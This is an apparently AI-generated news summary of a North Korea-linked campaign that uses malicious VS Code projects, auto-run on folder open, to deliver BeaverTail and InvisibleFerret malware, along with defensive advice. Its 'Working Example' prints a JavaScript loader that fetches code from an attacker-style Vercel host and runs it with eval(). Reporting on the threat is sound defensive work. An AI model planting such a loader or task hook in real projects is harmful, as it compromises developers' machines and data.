North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
These articles are AI-generated summaries. Please check the original sources for full details.
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
North Korean state-sponsored threat actors, associated with the “Contagious Interview” campaign, are leveraging malicious Visual Studio Code (VS Code) projects to deliver backdoors, spyware, and cryptocurrency miners to developer systems. The campaign, first observed in December 2025, utilizes VS Code task files to execute payloads staged on Vercel domains.
Why This Matters
The increasing sophistication of supply chain attacks targeting developers represents a significant escalation in cyber threats. Traditionally, developers were considered indirect targets; now, they are directly compromised to gain access to valuable source code, intellectual property, and financial systems, potentially resulting in millions of dollars in stolen cryptocurrency and intellectual property. The cost of remediation following a successful compromise can easily exceed six figures per incident.
Key Insights
- Contagious Interview Campaign: Active since 2025, evolving to use VS Code tasks for initial compromise.
- VS Code Task Abuse: Attackers exploit the “runOn: folderOpen” setting to execute malicious JavaScript payloads automatically when a project is opened.
- BeaverTail & InvisibleFerret: Two malware families deployed in the attacks, offering remote code execution, keylogging, and data exfiltration capabilities, with the latter utilizing a Python environment.
Working Example
// Example of obfuscated JavaScript payload (simplified)
// This is a conceptual example and does not represent the full complexity of the actual payload
function executePayload() {
fetch('https://ip-regions-check.vercel[.]app/payload.js')
.then(response => response.text())
.then(data => {
eval(data); // Execute the received JavaScript code
})
.catch(error => {
console.error('Error fetching payload:', error);
});
}
executePayload();Practical Applications
- Security Teams: Implement robust code review processes and endpoint detection and response (EDR) systems to identify and block malicious code execution.
- Pitfall: Relying solely on static analysis of code; attackers are employing dynamic payload delivery and obfuscation techniques to evade detection.
References:
Continue reading
Next article
North Korean PurpleBravo Campaign Targeted 3,136 IPs via Fake Job Interviews
Related Content
North Korean Hackers Deploy 197 npm Packages to Spread Updated OtterCookie Malware
North Korean hackers deployed 197 malicious npm packages, downloaded 31,000 times, to spread evolved OtterCookie malware via fake job interviews.
‘Contagious Interview’ Attack Now Delivers Backdoor Via VS Code
North Korean threat actors are exploiting Visual Studio Code to deliver a JavaScript backdoor, enabling remote code execution with no user interaction.
North Korean PurpleBravo Campaign Targeted 3,136 IPs via Fake Job Interviews
North Korean PurpleBravo hackers targeted 3,136 IP addresses and 20 companies with malicious VS Code projects and BeaverTail malware.